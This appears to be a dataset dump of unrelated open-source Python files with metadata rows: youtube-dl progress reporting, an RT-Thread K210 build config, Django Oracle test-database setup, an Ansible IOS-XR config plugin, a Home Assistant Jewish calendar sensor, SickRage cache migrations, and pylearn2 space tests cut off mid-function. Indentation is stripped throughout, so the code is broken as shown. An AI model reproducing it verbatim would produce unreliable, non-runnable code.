clear_line = '\r'
else:
clear_line = ('\r\x1b[K' if sys.stderr.isatty() else '\r')
self.to_screen(clear_line + fullmsg, skip_eol=not is_last_line)
self.to_console_title('youtube-dl ' + msg)
def report_progress(self, s):
if s['status'] == 'finished':
if self.params.get('noprogress', False):
self.to_screen('[download] Download completed')
else:
s['_total_bytes_str'] = format_bytes(s['total_bytes'])
if s.get('elapsed') is not None:
s['_elapsed_str'] = self.format_seconds(s['elapsed'])
msg_template = '100%% of %(_total_bytes_str)s in %(_elapsed_str)s'
else:
msg_template = '100%% of %(_total_bytes_str)s'
self._report_progress_status(
msg_template % s, is_last_line=True)
if self.params.get('noprogress'):
return
if s['status'] != 'downloading':
return
if s.get('eta') is not None:
s['_eta_str'] = self.format_eta(s['eta'])
else:
s['_eta_str'] = 'Unknown ETA'
if s.get('total_bytes') and s.get('downloaded_bytes') is not None:
s['_percent_str'] = self.format_percent(100 * s['downloaded_bytes'] / s['total_bytes'])
elif s.get('total_bytes_estimate') and s.get('downloaded_bytes') is not None:
s['_percent_str'] = self.format_percent(100 * s['downloaded_bytes'] / s['total_bytes_estimate'])
else:
if s.get('downloaded_bytes') == 0:
s['_percent_str'] = self.format_percent(0)
else:
s['_percent_str'] = 'Unknown %'
if s.get('speed') is not None:
s['_speed_str'] = self.format_speed(s['speed'])
else:
s['_speed_str'] = 'Unknown speed'
if s.get('total_bytes') is not None:
s['_total_bytes_str'] = format_bytes(s['total_bytes'])
msg_template = '%(_percent_str)s of %(_total_bytes_str)s at %(_speed_str)s ETA %(_eta_str)s'
elif s.get('total_bytes_estimate') is not None:
s['_total_bytes_estimate_str'] = format_bytes(s['total_bytes_estimate'])
msg_template = '%(_percent_str)s of ~%(_total_bytes_estimate_str)s at %(_speed_str)s ETA %(_eta_str)s'
else:
if s.get('downloaded_bytes') is not None:
s['_downloaded_bytes_str'] = format_bytes(s['downloaded_bytes'])
if s.get('elapsed'):
s['_elapsed_str'] = self.format_seconds(s['elapsed'])
msg_template = '%(_downloaded_bytes_str)s at %(_speed_str)s (%(_elapsed_str)s)'
else:
msg_template = '%(_downloaded_bytes_str)s at %(_speed_str)s'
else:
msg_template = '%(_percent_str)s % at %(_speed_str)s ETA %(_eta_str)s'
self._report_progress_status(msg_template % s)
def report_resuming_byte(self, resume_len):
"""Report attempt to resume at given byte."""
self.to_screen('[download] Resuming download at byte %s' % resume_len)
def report_retry(self, count, retries):
"""Report retry in case of HTTP error 5xx"""
self.to_screen('[download] Got server HTTP error. Retrying (attempt %d of %d)...' % (count, retries))
def report_file_already_downloaded(self, file_name):
"""Report file has already been fully downloaded."""
try:
self.to_screen('[download] %s has already been downloaded' % file_name)
except UnicodeEncodeError:
self.to_screen('[download] The file has already been downloaded')
def report_unable_to_resume(self):
"""Report it was impossible to resume download."""
self.to_screen('[download] Unable to resume')
def download(self, filename, info_dict):
"""Download to a filename using the info from info_dict
Return True on success and False otherwise
"""
nooverwrites_and_exists = (
self.params.get('nooverwrites', False) and
os.path.exists(encodeFilename(filename))
)
continuedl_and_exists = (
self.params.get('continuedl', True) and
os.path.isfile(encodeFilename(filename)) and
not self.params.get('nopart', False)
)
# Check file already present
if filename != '-' and nooverwrites_and_exists or continuedl_and_exists:
self.report_file_already_downloaded(filename)
self._hook_progress({
'filename': filename,
'status': 'finished',
'total_bytes': os.path.getsize(encodeFilename(filename)),
})
return True
sleep_interval = self.params.get('sleep_interval')
if sleep_interval:
self.to_screen('[download] Sleeping %s seconds...' % sleep_interval)
time.sleep(sleep_interval)
return self.real_download(filename, info_dict)
def real_download(self, filename, info_dict):
"""Real download process. Redefine in subclasses."""
raise NotImplementedError('This method must be implemented by subclasses')
def _hook_progress(self, status):
for ph in self._progress_hooks:
ph(status)
def add_progress_hook(self, ph):
# See YoutubeDl.py (search for progress_hooks) for a description of
# this interface
self._progress_hooks.append(ph)
def _debug_cmd(self, args, exe=None):
if not self.params.get('verbose', False):
return
str_args = [decodeArgument(a) for a in args]
if exe is None:
exe = os.path.basename(str_args[0])
try:
import pipes
shell_quote = lambda args: ' '.join(map(pipes.quote, str_args))
except ImportError:
shell_quote = repr
self.to_screen('[debug] %s command line: %s' % (
exe, shell_quote(str_args)))
| unlicense | -4,916,545,909,078,302,000 | 36.225806 | 114 | 0.570624 | false |
armink/rt-thread | bsp/k210/rtconfig.py | 6 | 1560 | import os
# toolchains options
ARCH ='risc-v'
CPU ='k210'
CROSS_TOOL ='gcc'
if os.getenv('RTT_ROOT'):
RTT_ROOT = os.getenv('RTT_ROOT')
else:
RTT_ROOT = r'../..'
if os.getenv('RTT_CC'):
CROSS_TOOL = os.getenv('RTT_CC')
if CROSS_TOOL == 'gcc':
PLATFORM = 'gcc'
EXEC_PATH = r'/opt/gnu-mcu-eclipse/riscv-none-gcc/8.2.0-2.1-20190425-1021/bin'
else:
print('Please make sure your toolchains is GNU GCC!')
exit(0)
if os.getenv('RTT_EXEC_PATH'):
EXEC_PATH = os.getenv('RTT_EXEC_PATH')
BUILD = 'release'
if PLATFORM == 'gcc':
# toolchains
PREFIX = 'riscv-none-embed-'
CC = PREFIX + 'gcc'
CXX = PREFIX + 'g++'
AS = PREFIX + 'gcc'
AR = PREFIX + 'ar'
LINK = PREFIX + 'gcc'
TARGET_EXT = 'elf'
SIZE = PREFIX + 'size'
OBJDUMP = PREFIX + 'objdump'
OBJCPY = PREFIX + 'objcopy'
DEVICE = ' -mcmodel=medany -march=rv64imafc -mabi=lp64f -fsingle-precision-constant'
CFLAGS = DEVICE + ' -fno-common -ffunction-sections -fdata-sections -fstrict-volatile-bitfields'
AFLAGS = ' -c' + DEVICE + ' -x assembler-with-cpp'
LFLAGS = DEVICE + ' -nostartfiles -Wl,--gc-sections,-Map=rtthread.map,-cref,-u,_start -T link.lds'
CPATH = ''
LPATH = ''
if BUILD == 'debug':
CFLAGS += ' -O0 -ggdb'
AFLAGS += ' -ggdb'
else:
CFLAGS += ' -O2 -Os'
CXXFLAGS = CFLAGS
DUMP_ACTION = OBJDUMP + ' -D -S $TARGET > rtt.asm\n'
POST_ACTION = OBJCPY + ' -O binary $TARGET rtthread.bin\n' + SIZE + ' $TARGET \n'
| apache-2.0 | 1,494,322,203,547,483,600 | 26.368421 | 103 | 0.571154 | false |
ChenJunor/hue | desktop/core/ext-py/Django-1.6.10/django/db/backends/oracle/creation.py | 104 | 12331 | import sys
import time
from django.conf import settings
from django.db.backends.creation import BaseDatabaseCreation
from django.utils.six.moves import input
TEST_DATABASE_PREFIX = 'test_'
PASSWORD = 'Im_a_lumberjack'
class DatabaseCreation(BaseDatabaseCreation):
# This dictionary maps Field objects to their associated Oracle column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
#
# Any format strings starting with "qn_" are quoted before being used in the
# output (the "qn_" prefix is stripped before the lookup is performed.
data_types = {
'AutoField': 'NUMBER(11)',
'BinaryField': 'BLOB',
'BooleanField': 'NUMBER(1) CHECK (%(qn_column)s IN (0,1))',
'CharField': 'NVARCHAR2(%(max_length)s)',
'CommaSeparatedIntegerField': 'VARCHAR2(%(max_length)s)',
'DateField': 'DATE',
'DateTimeField': 'TIMESTAMP',
'DecimalField': 'NUMBER(%(max_digits)s, %(decimal_places)s)',
'FileField': 'NVARCHAR2(%(max_length)s)',
'FilePathField': 'NVARCHAR2(%(max_length)s)',
'FloatField': 'DOUBLE PRECISION',
'IntegerField': 'NUMBER(11)',
'BigIntegerField': 'NUMBER(19)',
'IPAddressField': 'VARCHAR2(15)',
'GenericIPAddressField': 'VARCHAR2(39)',
'NullBooleanField': 'NUMBER(1) CHECK ((%(qn_column)s IN (0,1)) OR (%(qn_column)s IS NULL))',
'OneToOneField': 'NUMBER(11)',
'PositiveIntegerField': 'NUMBER(11) CHECK (%(qn_column)s >= 0)',
'PositiveSmallIntegerField': 'NUMBER(11) CHECK (%(qn_column)s >= 0)',
'SlugField': 'NVARCHAR2(%(max_length)s)',
'SmallIntegerField': 'NUMBER(11)',
'TextField': 'NCLOB',
'TimeField': 'TIMESTAMP',
'URLField': 'VARCHAR2(%(max_length)s)',
}
def __init__(self, connection):
super(DatabaseCreation, self).__init__(connection)
def _create_test_db(self, verbosity=1, autoclobber=False):
TEST_NAME = self._test_database_name()
TEST_USER = self._test_database_user()
TEST_PASSWD = self._test_database_passwd()
TEST_TBLSPACE = self._test_database_tblspace()
TEST_TBLSPACE_TMP = self._test_database_tblspace_tmp()
parameters = {
'dbname': TEST_NAME,
'user': TEST_USER,
'password': TEST_PASSWD,
'tblspace': TEST_TBLSPACE,
'tblspace_temp': TEST_TBLSPACE_TMP,
}
cursor = self.connection.cursor()
if self._test_database_create():
try:
self._execute_test_db_creation(cursor, parameters, verbosity)
except Exception as e:
sys.stderr.write("Got an error creating the test database: %s\n" % e)
if not autoclobber:
confirm = input("It appears the test database, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % TEST_NAME)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print("Destroying old test database '%s'..." % self.connection.alias)
self._execute_test_db_destruction(cursor, parameters, verbosity)
self._execute_test_db_creation(cursor, parameters, verbosity)
except Exception as e:
sys.stderr.write("Got an error recreating the test database: %s\n" % e)
sys.exit(2)
else:
print("Tests cancelled.")
sys.exit(1)
if self._test_user_create():
if verbosity >= 1:
print("Creating test user...")
try:
self._create_test_user(cursor, parameters, verbosity)
except Exception as e:
sys.stderr.write("Got an error creating the test user: %s\n" % e)
if not autoclobber:
confirm = input("It appears the test user, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % TEST_USER)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print("Destroying old test user...")
self._destroy_test_user(cursor, parameters, verbosity)
if verbosity >= 1:
print("Creating test user...")
self._create_test_user(cursor, parameters, verbosity)
except Exception as e:
sys.stderr.write("Got an error recreating the test user: %s\n" % e)
sys.exit(2)
else:
print("Tests cancelled.")
sys.exit(1)
real_settings = settings.DATABASES[self.connection.alias]
real_settings['SAVED_USER'] = self.connection.settings_dict['SAVED_USER'] = self.connection.settings_dict['USER']
real_settings['SAVED_PASSWORD'] = self.connection.settings_dict['SAVED_PASSWORD'] = self.connection.settings_dict['PASSWORD']
real_settings['TEST_USER'] = real_settings['USER'] = self.connection.settings_dict['TEST_USER'] = self.connection.settings_dict['USER'] = TEST_USER
real_settings['PASSWORD'] = self.connection.settings_dict['PASSWORD'] = TEST_PASSWD
return self.connection.settings_dict['NAME']
def _destroy_test_db(self, test_database_name, verbosity=1):
"""
Destroy a test database, prompting the user for confirmation if the
database already exists. Returns the name of the test database created.
"""
TEST_NAME = self._test_database_name()
TEST_USER = self._test_database_user()
TEST_PASSWD = self._test_database_passwd()
TEST_TBLSPACE = self._test_database_tblspace()
TEST_TBLSPACE_TMP = self._test_database_tblspace_tmp()
self.connection.settings_dict['USER'] = self.connection.settings_dict['SAVED_USER']
self.connection.settings_dict['PASSWORD'] = self.connection.settings_dict['SAVED_PASSWORD']
parameters = {
'dbname': TEST_NAME,
'user': TEST_USER,
'password': TEST_PASSWD,
'tblspace': TEST_TBLSPACE,
'tblspace_temp': TEST_TBLSPACE_TMP,
}
cursor = self.connection.cursor()
time.sleep(1) # To avoid "database is being accessed by other users" errors.
if self._test_user_create():
if verbosity >= 1:
print('Destroying test user...')
self._destroy_test_user(cursor, parameters, verbosity)
if self._test_database_create():
if verbosity >= 1:
print('Destroying test database tables...')
self._execute_test_db_destruction(cursor, parameters, verbosity)
self.connection.close()
def _execute_test_db_creation(self, cursor, parameters, verbosity):
if verbosity >= 2:
print("_create_test_db(): dbname = %s" % parameters['dbname'])
statements = [
"""CREATE TABLESPACE %(tblspace)s
DATAFILE '%(tblspace)s.dbf' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE 200M
""",
"""CREATE TEMPORARY TABLESPACE %(tblspace_temp)s
TEMPFILE '%(tblspace_temp)s.dbf' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE 100M
""",
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _create_test_user(self, cursor, parameters, verbosity):
if verbosity >= 2:
print("_create_test_user(): username = %s" % parameters['user'])
statements = [
"""CREATE USER %(user)s
IDENTIFIED BY %(password)s
DEFAULT TABLESPACE %(tblspace)s
TEMPORARY TABLESPACE %(tblspace_temp)s
QUOTA UNLIMITED ON %(tblspace)s
""",
"""GRANT CONNECT, RESOURCE TO %(user)s""",
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _execute_test_db_destruction(self, cursor, parameters, verbosity):
if verbosity >= 2:
print("_execute_test_db_destruction(): dbname=%s" % parameters['dbname'])
statements = [
'DROP TABLESPACE %(tblspace)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS',
'DROP TABLESPACE %(tblspace_temp)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS',
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _destroy_test_user(self, cursor, parameters, verbosity):
if verbosity >= 2:
print("_destroy_test_user(): user=%s" % parameters['user'])
print("Be patient. This can take some time...")
statements = [
'DROP USER %(user)s CASCADE',
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _execute_statements(self, cursor, statements, parameters, verbosity):
for template in statements:
stmt = template % parameters
if verbosity >= 2:
print(stmt)
try:
cursor.execute(stmt)
except Exception as err:
sys.stderr.write("Failed (%s)\n" % (err))
raise
def _test_database_name(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
try:
if self.connection.settings_dict['TEST_NAME']:
name = self.connection.settings_dict['TEST_NAME']
except AttributeError:
pass
return name
def _test_database_create(self):
return self.connection.settings_dict.get('TEST_CREATE', True)
def _test_user_create(self):
return self.connection.settings_dict.get('TEST_USER_CREATE', True)
def _test_database_user(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['USER']
try:
if self.connection.settings_dict['TEST_USER']:
name = self.connection.settings_dict['TEST_USER']
except KeyError:
pass
return name
def _test_database_passwd(self):
name = PASSWORD
try:
if self.connection.settings_dict['TEST_PASSWD']:
name = self.connection.settings_dict['TEST_PASSWD']
except KeyError:
pass
return name
def _test_database_tblspace(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
try:
if self.connection.settings_dict['TEST_TBLSPACE']:
name = self.connection.settings_dict['TEST_TBLSPACE']
except KeyError:
pass
return name
def _test_database_tblspace_tmp(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME'] + '_temp'
try:
if self.connection.settings_dict['TEST_TBLSPACE_TMP']:
name = self.connection.settings_dict['TEST_TBLSPACE_TMP']
except KeyError:
pass
return name
def _get_test_db_name(self):
"""
We need to return the 'production' DB name to get the test DB creation
machinery to work. This isn't a great deal in this case because DB
names as handled by Django haven't real counterparts in Oracle.
"""
return self.connection.settings_dict['NAME']
def test_db_signature(self):
settings_dict = self.connection.settings_dict
return (
settings_dict['HOST'],
settings_dict['PORT'],
settings_dict['ENGINE'],
settings_dict['NAME'],
self._test_database_user(),
)
| apache-2.0 | -8,043,862,175,754,762,000 | 43.516245 | 155 | 0.561268 | false |
bjolivot/ansible | lib/ansible/plugins/action/iosxr_config.py | 79 | 4164 | #
# (c) 2017, Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import re
import time
import glob
from ansible.plugins.action.iosxr import ActionModule as _ActionModule
from ansible.module_utils._text import to_text
from ansible.module_utils.six.moves.urllib.parse import urlsplit
from ansible.utils.vars import merge_hash
PRIVATE_KEYS_RE = re.compile('__.+__')
class ActionModule(_ActionModule):
def run(self, tmp=None, task_vars=None):
if self._task.args.get('src'):
try:
self._handle_template()
except ValueError as exc:
return dict(failed=True, msg=exc.message)
result = super(ActionModule, self).run(tmp, task_vars)
if self._task.args.get('backup') and result.get('__backup__'):
# User requested backup and no error occurred in module.
# NOTE: If there is a parameter error, _backup key may not be in results.
filepath = self._write_backup(task_vars['inventory_hostname'],
result['__backup__'])
result['backup_path'] = filepath
# strip out any keys that have two leading and two trailing
# underscore characters
for key in result.keys():
if PRIVATE_KEYS_RE.match(key):
del result[key]
return result
def _get_working_path(self):
cwd = self._loader.get_basedir()
if self._task._role is not None:
cwd = self._task._role._role_path
return cwd
def _write_backup(self, host, contents):
backup_path = self._get_working_path() + '/backup'
if not os.path.exists(backup_path):
os.mkdir(backup_path)
for fn in glob.glob('%s/%s*' % (backup_path, host)):
os.remove(fn)
tstamp = time.strftime("%Y-%m-%d@%H:%M:%S", time.localtime(time.time()))
filename = '%s/%s_config.%s' % (backup_path, host, tstamp)
open(filename, 'w').write(contents)
return filename
def _handle_template(self):
src = self._task.args.get('src')
working_path = self._get_working_path()
if os.path.isabs(src) or urlsplit('src').scheme:
source = src
else:
source = self._loader.path_dwim_relative(working_path, 'templates', src)
if not source:
source = self._loader.path_dwim_relative(working_path, src)
if not os.path.exists(source):
raise ValueError('path specified in src not found')
try:
with open(source, 'r') as f:
template_data = to_text(f.read())
except IOError:
return dict(failed=True, msg='unable to load src file')
# Create a template search path in the following order:
# [working_path, self_role_path, dependent_role_paths, dirname(source)]
searchpath = [working_path]
if self._task._role is not None:
searchpath.append(self._task._role._role_path)
if hasattr(self._task, "_block:"):
dep_chain = self._task._block.get_dep_chain()
if dep_chain is not None:
for role in dep_chain:
searchpath.append(role._role_path)
searchpath.append(os.path.dirname(source))
self._templar.environment.loader.searchpath = searchpath
self._task.args['src'] = self._templar.template(template_data)
| gpl-3.0 | 4,619,096,043,227,065,000 | 36.178571 | 85 | 0.615034 | false |
home-assistant/home-assistant | homeassistant/components/jewish_calendar/sensor.py | 5 | 6627 | """Platform to retrieve Jewish calendar information for Home Assistant."""
import logging
import hdate
from homeassistant.components.sensor import SensorEntity
from homeassistant.const import DEVICE_CLASS_TIMESTAMP, SUN_EVENT_SUNSET
from homeassistant.helpers.sun import get_astral_event_date
import homeassistant.util.dt as dt_util
from . import DOMAIN, SENSOR_TYPES
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up the Jewish calendar sensor platform."""
if discovery_info is None:
return
sensors = [
JewishCalendarSensor(hass.data[DOMAIN], sensor, sensor_info)
for sensor, sensor_info in SENSOR_TYPES["data"].items()
]
sensors.extend(
JewishCalendarTimeSensor(hass.data[DOMAIN], sensor, sensor_info)
for sensor, sensor_info in SENSOR_TYPES["time"].items()
)
async_add_entities(sensors)
class JewishCalendarSensor(SensorEntity):
"""Representation of an Jewish calendar sensor."""
def __init__(self, data, sensor, sensor_info):
"""Initialize the Jewish calendar sensor."""
self._location = data["location"]
self._type = sensor
self._name = f"{data['name']} {sensor_info[0]}"
self._icon = sensor_info[1]
self._hebrew = data["language"] == "hebrew"
self._candle_lighting_offset = data["candle_lighting_offset"]
self._havdalah_offset = data["havdalah_offset"]
self._diaspora = data["diaspora"]
self._state = None
self._prefix = data["prefix"]
self._holiday_attrs = {}
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unique_id(self) -> str:
"""Generate a unique id."""
return f"{self._prefix}_{self._type}"
@property
def icon(self):
"""Icon to display in the front end."""
return self._icon
@property
def state(self):
"""Return the state of the sensor."""
return self._state
async def async_update(self):
"""Update the state of the sensor."""
now = dt_util.now()
_LOGGER.debug("Now: %s Location: %r", now, self._location)
today = now.date()
sunset = dt_util.as_local(
get_astral_event_date(self.hass, SUN_EVENT_SUNSET, today)
)
_LOGGER.debug("Now: %s Sunset: %s", now, sunset)
daytime_date = hdate.HDate(today, diaspora=self._diaspora, hebrew=self._hebrew)
# The Jewish day starts after darkness (called "tzais") and finishes at
# sunset ("shkia"). The time in between is a gray area (aka "Bein
# Hashmashot" - literally: "in between the sun and the moon").
# For some sensors, it is more interesting to consider the date to be
# tomorrow based on sunset ("shkia"), for others based on "tzais".
# Hence the following variables.
after_tzais_date = after_shkia_date = daytime_date
today_times = self.make_zmanim(today)
if now > sunset:
after_shkia_date = daytime_date.next_day
if today_times.havdalah and now > today_times.havdalah:
after_tzais_date = daytime_date.next_day
self._state = self.get_state(daytime_date, after_shkia_date, after_tzais_date)
_LOGGER.debug("New value for %s: %s", self._type, self._state)
def make_zmanim(self, date):
"""Create a Zmanim object."""
return hdate.Zmanim(
date=date,
location=self._location,
candle_lighting_offset=self._candle_lighting_offset,
havdalah_offset=self._havdalah_offset,
hebrew=self._hebrew,
)
@property
def extra_state_attributes(self):
"""Return the state attributes."""
if self._type != "holiday":
return {}
return self._holiday_attrs
def get_state(self, daytime_date, after_shkia_date, after_tzais_date):
"""For a given type of sensor, return the state."""
# Terminology note: by convention in py-libhdate library, "upcoming"
# refers to "current" or "upcoming" dates.
if self._type == "date":
return after_shkia_date.hebrew_date
if self._type == "weekly_portion":
# Compute the weekly portion based on the upcoming shabbat.
return after_tzais_date.upcoming_shabbat.parasha
if self._type == "holiday":
self._holiday_attrs["id"] = after_shkia_date.holiday_name
self._holiday_attrs["type"] = after_shkia_date.holiday_type.name
self._holiday_attrs["type_id"] = after_shkia_date.holiday_type.value
return after_shkia_date.holiday_description
if self._type == "omer_count":
return after_shkia_date.omer_day
if self._type == "daf_yomi":
return daytime_date.daf_yomi
return None
class JewishCalendarTimeSensor(JewishCalendarSensor):
"""Implement attrbutes for sensors returning times."""
@property
def state(self):
"""Return the state of the sensor."""
return dt_util.as_utc(self._state) if self._state is not None else None
@property
def device_class(self):
"""Return the class of this sensor."""
return DEVICE_CLASS_TIMESTAMP
@property
def extra_state_attributes(self):
"""Return the state attributes."""
attrs = {}
if self._state is None:
return attrs
return attrs
def get_state(self, daytime_date, after_shkia_date, after_tzais_date):
"""For a given type of sensor, return the state."""
if self._type == "upcoming_shabbat_candle_lighting":
times = self.make_zmanim(
after_tzais_date.upcoming_shabbat.previous_day.gdate
)
return times.candle_lighting
if self._type == "upcoming_candle_lighting":
times = self.make_zmanim(
after_tzais_date.upcoming_shabbat_or_yom_tov.first_day.previous_day.gdate
)
return times.candle_lighting
if self._type == "upcoming_shabbat_havdalah":
times = self.make_zmanim(after_tzais_date.upcoming_shabbat.gdate)
return times.havdalah
if self._type == "upcoming_havdalah":
times = self.make_zmanim(
after_tzais_date.upcoming_shabbat_or_yom_tov.last_day.gdate
)
return times.havdalah
times = self.make_zmanim(dt_util.now()).zmanim
return times[self._type]
| apache-2.0 | 2,915,521,554,264,026,000 | 34.438503 | 89 | 0.615211 | false |
sharkykh/SickRage | sickbeard/databases/cache_db.py | 5 | 5192 | # coding=utf-8
# Author: Nic Wolfe <[email protected]>
# URL: https://sickrage.github.io
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from sickbeard import db
# Add new migrations at the bottom of the list; subclass the previous migration.
class InitialSchema(db.SchemaUpgrade):
def test(self):
return self.hasTable("db_version")
def execute(self):
queries = [
("CREATE TABLE lastUpdate (provider TEXT, time NUMERIC);",),
("CREATE TABLE lastSearch (provider TEXT, time NUMERIC);",),
("CREATE TABLE scene_exceptions (exception_id INTEGER PRIMARY KEY, indexer_id INTEGER, show_name TEXT, season NUMERIC DEFAULT -1, custom NUMERIC DEFAULT 0);",),
("CREATE TABLE scene_names (indexer_id INTEGER, name TEXT);",),
("CREATE TABLE network_timezones (network_name TEXT PRIMARY KEY, timezone TEXT);",),
("CREATE TABLE scene_exceptions_refresh (list TEXT PRIMARY KEY, last_refreshed INTEGER);",),
("CREATE TABLE db_version (db_version INTEGER);",),
("INSERT INTO db_version(db_version) VALUES (1);",),
]
for query in queries:
if len(query) == 1:
self.connection.action(query[0])
else:
self.connection.action(query[0], query[1:])
class AddSceneExceptions(InitialSchema):
def test(self):
return self.hasTable("scene_exceptions")
def execute(self):
self.connection.action(
"CREATE TABLE scene_exceptions (exception_id INTEGER PRIMARY KEY, indexer_id INTEGER, show_name TEXT);")
class AddSceneNameCache(AddSceneExceptions):
def test(self):
return self.hasTable("scene_names")
def execute(self):
self.connection.action("CREATE TABLE scene_names (indexer_id INTEGER, name TEXT);")
class AddNetworkTimezones(AddSceneNameCache):
def test(self):
return self.hasTable("network_timezones")
def execute(self):
self.connection.action("CREATE TABLE network_timezones (network_name TEXT PRIMARY KEY, timezone TEXT);")
class AddLastSearch(AddNetworkTimezones):
def test(self):
return self.hasTable("lastSearch")
def execute(self):
self.connection.action("CREATE TABLE lastSearch (provider TEXT, time NUMERIC);")
class AddSceneExceptionsSeasons(AddLastSearch):
def test(self):
return self.hasColumn("scene_exceptions", "season")
def execute(self):
self.addColumn("scene_exceptions", "season", "NUMERIC", -1)
class AddSceneExceptionsCustom(AddSceneExceptionsSeasons): # pylint:disable=too-many-ancestors
def test(self):
return self.hasColumn("scene_exceptions", "custom")
def execute(self):
self.addColumn("scene_exceptions", "custom", "NUMERIC", 0)
class AddSceneExceptionsRefresh(AddSceneExceptionsCustom): # pylint:disable=too-many-ancestors
def test(self):
return self.hasTable("scene_exceptions_refresh")
def execute(self):
self.connection.action(
"CREATE TABLE scene_exceptions_refresh (list TEXT PRIMARY KEY, last_refreshed INTEGER);")
class ConvertSceneExeptionsToIndexerScheme(AddSceneExceptionsRefresh): # pylint:disable=too-many-ancestors
def test(self):
return self.hasColumn("scene_exceptions", "indexer_id")
def execute(self):
self.connection.action("DROP TABLE IF EXISTS tmp_scene_exceptions;")
self.connection.action("ALTER TABLE scene_exceptions RENAME TO tmp_scene_exceptions;")
self.connection.action("CREATE TABLE scene_exceptions (exception_id INTEGER PRIMARY KEY, indexer_id INTEGER, show_name TEXT, season NUMERIC DEFAULT -1, custom NUMERIC DEFAULT 0);")
self.connection.action("INSERT INTO scene_exceptions SELECT exception_id, tvdb_id as indexer_id, show_name, season, custom FROM tmp_scene_exceptions;")
self.connection.action("DROP TABLE tmp_scene_exceptions;")
class ConvertSceneNamesToIndexerScheme(AddSceneExceptionsRefresh): # pylint:disable=too-many-ancestors
def test(self):
return self.hasColumn("scene_names", "indexer_id")
def execute(self):
self.connection.action("DROP TABLE IF EXISTS tmp_scene_names;")
self.connection.action("ALTER TABLE scene_names RENAME TO tmp_scene_names;")
self.connection.action("CREATE TABLE scene_names (indexer_id INTEGER, name TEXT);")
self.connection.action("INSERT INTO scene_names SELECT * FROM tmp_scene_names;")
self.connection.action("DROP TABLE tmp_scene_names;")
| gpl-3.0 | -6,024,445,507,122,998,000 | 39.5625 | 188 | 0.699153 | false |
daemonmaker/pylearn2 | pylearn2/space/tests/test_space.py | 32 | 58117 | """
Tests for space utilities.
"""
from __future__ import print_function
import itertools
import warnings
import numpy as np
from theano.compat.six.moves import xrange
import theano
from theano import tensor
# Can't use nose.tools.assert_raises, only introduced in python 2.7. Use
# numpy.testing.assert_raises instead
from pylearn2.space import (SimplyTypedSpace,
VectorSpace,
Conv2DSpace,
CompositeSpace,
VectorSequenceSpace,
IndexSequenceSpace,
IndexSpace,
NullSpace,
is_symbolic_batch)
from pylearn2.utils import function, safe_zip
def test_np_format_as_vector2vector():
vector_space_initial = VectorSpace(dim=8 * 8 * 3, sparse=False)
vector_space_final = VectorSpace(dim=8 * 8 * 3, sparse=False)
data = np.arange(5 * 8 * 8 * 3).reshape(5, 8 * 8 * 3)
rval = vector_space_initial.np_format_as(data, vector_space_final)
assert np.all(rval == data)
def test_np_format_as_index2index():
index_space_initial = IndexSpace(max_labels=10, dim=1)
index_space_final = IndexSpace(max_labels=10, dim=1)
data = np.array([[0], [2], [1], [3], [5], [8], [1]])
rval = index_space_initial.np_format_as(data, index_space_final)
assert index_space_initial == index_space_final
assert np.all(rval == data)
index_space_downcast = IndexSpace(max_labels=10, dim=1, dtype='int32')
rval = index_space_initial.np_format_as(data, index_space_downcast)
assert index_space_initial != index_space_downcast
assert np.all(rval == data)
assert rval.dtype == 'int32' and data.dtype == 'int64'
def test_np_format_as_conv2d2conv2d():
conv2d_space_initial = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
conv2d_space_final = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
data = np.arange(5 * 8 * 8 * 3).reshape(5, 3, 8, 8)
rval = conv2d_space_initial.np_format_as(data, conv2d_space_final)
assert np.all(rval == data)
conv2d_space1 = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('c', 'b', 1, 0))
conv2d_space0 = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
data = np.arange(5 * 8 * 8 * 3).reshape(5, 3, 8, 8)
rval = conv2d_space0.np_format_as(data, conv2d_space1)
nval = data.transpose(1, 0, 3, 2)
assert np.all(rval == nval)
def test_np_format_as_vector2conv2d():
vector_space = VectorSpace(dim=8 * 8 * 3, sparse=False)
conv2d_space = Conv2DSpace(shape=(8, 8), num_channels=3,
axes=('b', 'c', 0, 1))
